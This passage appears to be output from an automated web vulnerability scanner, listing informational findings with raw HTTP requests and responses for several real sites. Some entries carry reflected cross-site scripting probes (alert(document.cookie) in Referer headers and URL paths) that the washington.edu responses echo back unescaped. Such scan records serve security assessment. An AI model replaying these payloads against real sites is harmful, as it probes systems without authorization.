X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>
Welcome to Google Advertising Programs
</title>
<link href="//www.google.com/css/gcs-v2.css" rel="stylesh
...[SNIP]...

30.123. http://www.google.com/intl/en/options/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/intl/en/options/

Request

Response

30.124. http://www.mit.edu/people/jik/software/xrn.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mit.edu
Path:	/people/jik/software/xrn.html

Request

GET /people/jik/software/xrn.html HTTP/1.1
Host: www.mit.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

30.125. http://www.munit.co.uk/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.munit.co.uk
Path:	/

Request

GET / HTTP/1.1
Host: www.munit.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

30.126. https://www.mytraderonline.com/css/promoCSS.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.mytraderonline.com
Path:	/css/promoCSS.php

Request

Response

30.127. https://www.mytraderonline.com/css/tolhomecss.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.mytraderonline.com
Path:	/css/tolhomecss.php

Request

Response

30.128. https://www.mytraderonline.com/javascript/master_s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.mytraderonline.com
Path:	/javascript/master_s_code.js

Request

Response

30.129. https://www.mytraderonline.com/javascript/realmedia.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.mytraderonline.com
Path:	/javascript/realmedia.js

Request

Response

30.130. http://www.netlingo.com/includes/category.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/includes/category.php

Request

GET /includes/category.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:54:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 1275
Connection: close
Content-Type: text/html

<script language="javascript" src="scripts/jquery.hint.js"></script>
<script language="javascript" type="text/javascript">

</script>
<div class="tab">
<div class="subscribe_box">

...[SNIP]...

30.131. http://www.netlingo.com/iphone/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/iphone/

Request

GET /iphone/ HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

30.132. http://www.netlingo.com/iphone/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/iphone/index.php

Request

GET /iphone/index.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

30.133. http://www.netlingo.com/more/adsizes.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/more/adsizes.php

Request

GET /more/adsizes.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

30.134. http://www.netlingo.com/more/color/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/more/color/index.php

Request

GET /more/color/index.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 275
Connection: close
Content-Type: text/html

<html><head><title>NetLingo: Web Coloring Book!</title></head>
<frameset rows="20%,80%" frameborder="0" framespacing="0" border="0">
<frame name="rendered" src="rendered.html" noresize scrolling=no
...[SNIP]...

30.135. http://www.newsguy.com/overview.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newsguy.com
Path:	/overview.htm

Request

GET /overview.htm HTTP/1.1
Host: www.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

30.136. http://www.newsreaders.com/unix/utilities.html/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newsreaders.com
Path:	/unix/utilities.html/x22

Request

GET /unix/utilities.html/x22 HTTP/1.1
Host: www.newsreaders.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:15:14 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 2652

<HTML><HEAD><TITLE>404 Error</TITLE></HEAD>
<BODY BGCOLOR = "white">





<CENTER><FONT SIZE = +2>an eMailman(sm
...[SNIP]...

30.137. http://www.nih.at/cg/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nih.at
Path:	/cg/

Request

GET /cg/ HTTP/1.1
Host: www.nih.at
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:09 GMT
Server: Apache/2.2.9 (Debian) Embperl/2.2.0 DAV/2 PHP/5.2.6-1+lenny8 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.2 Perl/v5.8.8
Accept-Ranges: bytes
Content-Length: 3659
Connection: close
Content-Type: text/html

<html>
<head>
<title>NiH: cg</title>
<link rel="stylesheet" href="../style.css" type="text/css">
<link rel="shortcut icon" href="../images/NiH-favicon.ico" type="image/x-icon">
<link rel="alt
...[SNIP]...

30.138. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.opengroup.org
Path:	/onlinepubs/009629399/apdxa.htm

Request

GET /onlinepubs/009629399/apdxa.htm HTTP/1.1
Host: www.opengroup.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:04:25 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 19841


<html><head>

<title>DCE 1.1: Remote Procedure Call - Universal Unique Identifier</title>
</head><body><center><a href="chap14.htm">Previou
...[SNIP]...

30.139. http://www.openusenet.org/diablo/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.openusenet.org
Path:	/diablo/

Request

GET /diablo/ HTTP/1.1
Host: www.openusenet.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

30.140. http://www.ossp.org/pkg/tool/lmtp2nntp/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ossp.org
Path:	/pkg/tool/lmtp2nntp/

Request

GET /pkg/tool/lmtp2nntp/ HTTP/1.1
Host: www.ossp.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

30.141. http://www.paperg.com/jsfb/embed.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.paperg.com
Path:	/jsfb/embed.php

Request

Response

30.142. http://www.rdrop.com/users/billmc/adcomplain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rdrop.com
Path:	/users/billmc/adcomplain.html

Request

GET /users/billmc/adcomplain.html HTTP/1.1
Host: www.rdrop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

30.143. http://www.sailinganarchy.com/ADs/nauticexpo/nauticexpo.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sailinganarchy.com
Path:	/ADs/nauticexpo/nauticexpo.htm

Request

GET /ADs/nauticexpo/nauticexpo.htm HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

30.144. http://www.sailinganarchy.com/breymaiersailing.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sailinganarchy.com
Path:	/breymaiersailing.com

Request

GET /breymaiersailing.com HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

30.145. http://www.sailinganarchy.com/none previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sailinganarchy.com
Path:	/none

Request

GET /none HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

30.146. http://www.soundingsonline.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/

Request

GET / HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:30:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-type: text/html

<br />
<b>Fatal error</b>: Maximum execution time of 30 seconds exceeded in <b>E:\Inetpub\SoundingsOnline\libraries\joomla\database\database\mysql.php</b> on line <b>221</b><br />

30.147. http://www.soundingssellmyboat.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingssellmyboat.com
Path:	/

Request

GET / HTTP/1.1
Host: www.soundingssellmyboat.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 315
Content-Type: text/html
Content-Location: http://www.soundingssellmyboat.com/index.htm
Last-Modified: Thu, 13 Aug 2009 17:35:47 GMT
Accept-Ranges: bytes
ETag: "b95287e3c1cca1:64e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 04:39:54 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Soundings Sell My Boat</title>

<meta http-equiv="REFRESH" content="0;url=https://www.soundingssellmyboat.com/w
...[SNIP]...

30.148. http://www.traderonline.com/css/promoCSS.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.traderonline.com
Path:	/css/promoCSS.php

Request

GET /css/promoCSS.php HTTP/1.1
Host: www.traderonline.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/x22ec89d%3Cscript%3Ealert(document.cookie)%3C/script%3E93a08fbf703
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:26:57 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 5249

/***********************
PROMOS
***********************/
.smlPromo3 {width: 249px; height: 293px;border: solid 1px #a2a2a2;background: url('http://tolimages.traderonline.com/img/tol-designtol/gradi
...[SNIP]...

30.149. http://www.traderonline.com/css/tolhomecss.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.traderonline.com
Path:	/css/tolhomecss.php

Request

GET /css/tolhomecss.php HTTP/1.1
Host: www.traderonline.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8009oaoAAx1V; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; s_pers=%20s_nr%3D1295884785350%7C1298476785350%3B%20s_lv%3D1295884785352%7C1390492785352%3B%20s_lv_s%3DFirst%2520Visit%7C1295886585352%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.2.10.1295884751

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:27 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9341

/******************
INDEX
*******************/
#idxTop{float:left;width:399px;margin-bottom:0;}
#idxBot{float:left;width:556px;border-left:2px #a2a2a2 solid;margin-bottom:0;}
#tileLftTp,#tileRtT
...[SNIP]...

30.150. http://www.traderonline.com/javascript/master_s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.traderonline.com
Path:	/javascript/master_s_code.js

Request

Response

30.151. http://www.traderonline.com/javascript/realmedia.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.traderonline.com
Path:	/javascript/realmedia.js

Request

GET /javascript/realmedia.js HTTP/1.1
Host: www.traderonline.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/x22ec89d%3Cscript%3Ealert(document.cookie)%3C/script%3E93a08fbf703
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:34 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 2566

   // Instantiate the real media variables
   var oas='http://ads.traderonline.com/RealMedia/ads/';
   var RN = new String (Math.random());
   var RNS = RN.substring (2,11);
   var _version = 40;

   // Functio
...[SNIP]...

30.152. http://www.traderpub.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.traderpub.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.traderpub.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/4.0
Date: Mon, 24 Jan 2011 16:04:25 GMT
Content-type: text/html
Content-length: 207

<TITLE>Not Found</TITLE><H1>Not Found</H1> The requested object does not exist on this server. The link you followed is either outdated, inaccurate, or the server has been instructed not to let you ha
...[SNIP]...

30.153. http://www.traderpub.com/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.traderpub.com
Path:	/x22

Request

GET /x22 HTTP/1.1
Host: www.traderpub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/4.0
Date: Mon, 24 Jan 2011 15:15:23 GMT
Content-type: text/html
Content-length: 207
Connection: close

<TITLE>Not Found</TITLE><H1>Not Found</H1> The requested object does not exist on this server. The link you followed is either outdated, inaccurate, or the server has been instructed not to let you ha
...[SNIP]...

30.154. http://www.vox.com/.shared/css/base.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vox.com
Path:	/.shared/css/base.css

Request

GET /.shared/css/base.css HTTP/1.1
Host: www.vox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Perlbal
Keep-Alive: timeout=30, max=100
Content-Length: 39
Date: Tue, 25 Jan 2011 04:39:49 GMT
X-Varnish: 2314529917
Age: 0
Via: 1.1 varnish
Connection: close

<h1>404 - Not Found</h1>
File not found

30.155. http://www.washington.edu/alpine/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpine/

Request

GET /alpine/ HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:11:59 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
Last-Modified: Wed, 02 Jun 2010 21:14:58 GMT
ETag: "508e38-14de-4881295089880"
Accept-Ranges: bytes
Content-Length: 5342
Vary: Accept-Encoding
Connection: close
Content-Type: text/html



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Alpine Messaging
...[SNIP]...

30.156. http://www.washington.edu/alpinef972a%3Cimg%20src%3da%20onerror%3dalert(String.fromCharCode(88,83,83))%3Ee6e3afeb687/a previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpinef972a%3Cimg%20src%3da%20onerror%3dalert(String.fromCharCode(88,83,83))%3Ee6e3afeb687/a

Request

GET /alpinef972a%3Cimg%20src%3da%20onerror%3dalert(String.fromCharCode(88,83,83))%3Ee6e3afeb687/a HTTP/1.1
Host: www.washington.edu
Proxy-Connection: keep-alive
Referer: http://www.washington.edu/alpinef972a%3Cimg%20src%3da%20onerror%3dalert(String.fromCharCode(88,83,83))%3Ee6e3afeb687/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:57:33 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1721

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a<img src=a onerror=alert(String.fromCharCode(88,83,83))>e6e3afeb687/a</b> w
...[SNIP]...

30.157. http://www.washington.edu/alpinef972a%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Ee6e3afeb687/a previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpinef972a%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Ee6e3afeb687/a

Request

GET /alpinef972a%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Ee6e3afeb687/a HTTP/1.1
Host: www.washington.edu
Proxy-Connection: keep-alive
Referer: http://www.washington.edu/alpinef972a%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Ee6e3afeb687/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:56:59 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1623

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a<img src=a onerror=alert(document.cookie)>e6e3afeb687/a</b> was not found o
...[SNIP]...

30.158. http://www.washington.edu/alpinef972a previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpinef972a<img

Request

GET /alpinef972a<img HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:52 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1028
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a<img</b> was not found or is no longer on this server.
<p>Please check the URL
...[SNIP]...

30.159. http://www.washington.edu/alpinef972a previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83

Request

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:58 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1175
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a<img src=a onerror=alert(String.fromCharCode(88,83,83</b> was not found or is
...[SNIP]...

30.160. http://www.washington.edu/alpinef972ae6e3afeb687/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83))>e6e3afeb687/

Request

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:57 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1225
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a<img src=a onerror=alert(String.fromCharCode(88,83,83))>e6e3afeb687/</b> wa
...[SNIP]...

30.161. http://www.washington.edu/alpinef972a previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpinef972a<img%20src=a%20onerror=alert(document.cookie

Request

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:53 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1136
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a<img src=a onerror=alert(document.cookie</b> was not found or is no longer on
...[SNIP]...

30.162. http://www.washington.edu/alpinef972ae6e3afeb687/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpinef972a<img%20src=a%20onerror=alert(document.cookie)>e6e3afeb687/

Request

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:52 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1183
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a<img src=a onerror=alert(document.cookie)>e6e3afeb687/</b> was not found or
...[SNIP]...

30.163. http://www.washington.edu/pine/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/pine/

Request

GET /pine/ HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:11:59 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
Last-Modified: Tue, 22 Jun 2010 11:34:33 GMT
ETag: "7274aa-1b4f-4899cce20c440"
Accept-Ranges: bytes
Content-Length: 6991
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta name="description" content="The Pine Information Center at the University of Washin
...[SNIP]...

30.164. http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.washingtonpost.com
Path:	/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354

Request

GET /wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354 HTTP/1.1
Host: www.washingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Web Server
Date: Mon, 24 Jan 2011 15:15:24 GMT
Content-type: text/html
Content-length: 4661
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
<title>Error - washingtonpost.com</title>

<script type="text/javascript">
<!--
//YOU CAN CHANGE THE NODE HERE
t
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.washingtonpost.com
Path:	/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354%20%20%20%20%20%20%20%20%20businessweek.com/ap/financialnews/D9J%20%20%20%20nytimes.com/2010/11/29/technology/29paypal.html%20%20%20%20%20%20%20%20%20%20%20bloomberg.com/news/2010-11-2cQtwMwAw

Request

